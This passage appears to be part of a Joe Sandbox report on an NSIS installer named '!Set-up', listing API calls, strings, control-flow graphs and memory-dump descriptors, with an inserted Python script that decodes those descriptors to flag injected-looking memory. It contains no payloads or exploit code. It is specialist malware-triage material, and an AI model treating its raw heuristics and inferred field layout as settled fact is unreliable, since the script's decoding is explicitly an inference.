                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                              Strings
                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                              • BringToFront, xrefs: 004016BD
                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                              • Rename: %s, xrefs: 004018F8
                                                              • Sleep(%d), xrefs: 0040169D
                                                              • Aborting: "%s", xrefs: 0040161D
                                                              • Jump: %d, xrefs: 00401602
                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                              • Rename failed: %s, xrefs: 0040194B
                                                              • Rename on reboot: %s, xrefs: 00401943
                                                              • detailprint: %s, xrefs: 00401679
                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                              • Call: %d, xrefs: 0040165A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                              • API String ID: 2872004960-3619442763
                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
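Every function entry above repeats the same "Memory Dump Source" list, and the region descriptors in it carry more than a file name: read against the "Offset: 00400000, based on PE: true" header, the values line up exactly with Windows memory constants for a normally mapped PE (0x02 = PAGE_READONLY at the header 0x400000, 0x20 = PAGE_EXECUTE_READ at 0x401000, 0x04 = PAGE_READWRITE from 0x40C000 on, and 0x1000000 = MEM_IMAGE throughout). The decoder below is an added example for this page, not Joe Sandbox code; the field layout it assumes is inferred from those values, not from documentation, so fields whose meaning the page does not establish are carried through undecoded. The regions from the list above are copied as the sample; the one "injected-like" descriptor is constructed here purely to show what the checks would catch and is not something this report lists.

```python
"""Decode the "Memory Dump Source" region descriptors of a sandbox report.

Added example, not Joe Sandbox code. The layout is inferred from the values on
the page: fields 4, 5 and 7 decode cleanly as base address, Windows PAGE_*
protection and MEM_* type. Fields 1, 2, 3, 6 and 8 are kept as raw strings
because the page does not establish what they mean.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTE_BITS = 0x10 | 0x20 | 0x40 | 0x80
WRITE_BITS = 0x04 | 0x08 | 0x40 | 0x80

_DESC = re.compile(
    r"^(?P<f1>[0-9A-F]{8})\.(?P<f2>[0-9A-F]{8})\.(?P<f3>[0-9A-F]+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$", re.IGNORECASE)


@dataclass
class Region:
    base: int               # field 4, virtual address of the region
    protect: int            # field 5, PAGE_* value
    mem_type: int           # field 7, MEM_* value
    raw: Tuple[str, ...]    # fields 1, 2, 3, 6 and 8, undecoded

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD (0x100) before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_BITS)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_BITS)


def parse_descriptor(name: str) -> Region:
    m = _DESC.match(name.strip())
    if not m:
        raise ValueError(f"not a dump descriptor: {name!r}")
    return Region(int(m["base"], 16), int(m["prot"], 16), int(m["mtype"], 16),
                  (m["f1"], m["f2"], m["f3"], m["f6"], m["f8"]))


def image_layout(descriptors: List[str], image_base: int) -> List[Tuple[int, str, str]]:
    """(RVA, protection, type) per region, sorted by address, relative to the
    image base the report states ("Offset: 00400000")."""
    regions = sorted((parse_descriptor(d) for d in descriptors), key=lambda r: r.base)
    return [(r.base - image_base, r.protect_name, r.type_name) for r in regions]


def suspicious(region: Region) -> List[str]:
    """Checks an analyst runs over every dumped region: code that is also
    writable, and executable memory not backed by an image, the usual footprint
    of unpacked or injected code. Every image-backed RO/RX/RW region passes."""
    reasons = []
    if region.executable and region.writable:
        reasons.append("writable+executable")
    if region.executable and region.mem_type != 0x1000000:
        reasons.append("executable outside MEM_IMAGE")
    return reasons


# Constructed sample: descriptors copied from the report's list (one per mapping kind).
REPORT_REGIONS = [
    "00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp",
]
# Hypothetical descriptor, constructed here only to exercise the checks: an RWX
# private region. The report above lists nothing like it.
INJECTED_LIKE = "00000000.00000002.0000000000.0000000002A00000.00000040.00000001.00020000.00000003.sdmp"

if __name__ == "__main__":
    for rva, prot, mtype in image_layout(REPORT_REGIONS, 0x400000):
        print(f"RVA 0x{rva:06X}  {prot:<24} {mtype}")
    print("injected-like:", suspicious(parse_descriptor(INJECTED_LIKE)))
```

The point of decoding rather than eyeballing is the negative result: for this process every executable region is image-backed and read-only, so none of the dumps listed here is a candidate for an unpacked or injected payload on its own. That is what to check first before spending time on a dump, and the same script applied to a later process's list (a child created suspended, for instance) is where an executable non-image region would show up.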

                                                              Control-flow Graph

                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                              • DestroyWindow.USER32 ref: 00405512
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID:
                                                              • API String ID: 3282139019-0
                                                              • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                              • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                              Control-flow Graph

                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                              APIs
                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                              • API String ID: 608394941-2746725676
                                                              • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                              • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                              • lstrcatW.KERNEL32(00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401A76
                                                              • CompareFileTime.KERNEL32(-00000014,?,%IsraeliSales%,%IsraeliSales%,00000000,00000000,%IsraeliSales%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.000000000051F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2036185064.0000000000525000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_!Set-up.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                              • String ID: %IsraeliSales%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                              • API String ID: 4286501637-1599634701
                                                              • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                              • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                              Control-flow Graph

                                                              control_flow_graph 653 40337f-403398 654 4033a1-4033a9 653->654 655 40339a 653->655 656 4033b2-4033b7 654->656 657 4033ab 654->657 655->654 658 4033c7-4033d4 call 403336 656->658 659 4033b9-4033c2 call 403368 656->659 657->656 663 4033d6 658->663 664 4033de-4033e5 658->664 659->658 665 4033d8-4033d9 663->665 666 403546-403548 664->666 667 4033eb-403432 GetTickCount 664->667 670 403567-40356b 665->670 668 40354a-40354d 666->668 669 4035ac-4035af 666->669 671 403564 667->671 672 403438-403440 667->672 673 403552-40355b call 403336 668->673 674 40354f 668->674 675 4035b1 669->675 676 40356e-403574 669->676 671->670 677 403442 672->677 678 403445-403453 call 403336 672->678 673->663 686 403561 673->686 674->673 675->671 681 403576 676->681 682 403579-403587 call 403336 676->682 677->678 678->663 687 403455-40345e 678->687 681->682 682->663 690 40358d-40359f WriteFile 682->690 686->671 689 403464-403484 call 4076a0 687->689 696 403538-40353a 689->696 697 40348a-40349d GetTickCount 689->697 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 692->693 695 4035a6-4035a9 692->695 693->665 695->669 696->665 698 4034e8-4034ec 697->698 699 40349f-4034a7 697->699 700 40352d-403530 698->700 701 4034ee-4034f1 698->701 702 4034a9-4034ad 699->702 703 4034af-4034e0 MulDiv wsprintfW call 404f9e 699->703 700->672 707 403536 700->707 705 403513-40351e 701->705 706 4034f3-403507 WriteFile 701->706 702->698 702->703 708 4034e5 703->708 710 403521-403525 705->710 706->693 709 403509-40350c 706->709 707->671 708->698 709->693 711 40350e-403511 709->711 710->689 712 40352b 710->712 711->710 712->671
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                              • wsprintfW.USER32 ref: 004034CE
                                                              • WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2035727500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2035714042.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035748572.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2035763074.00000000004C3000.00000004.00000001.01000000.00000003.sdmp
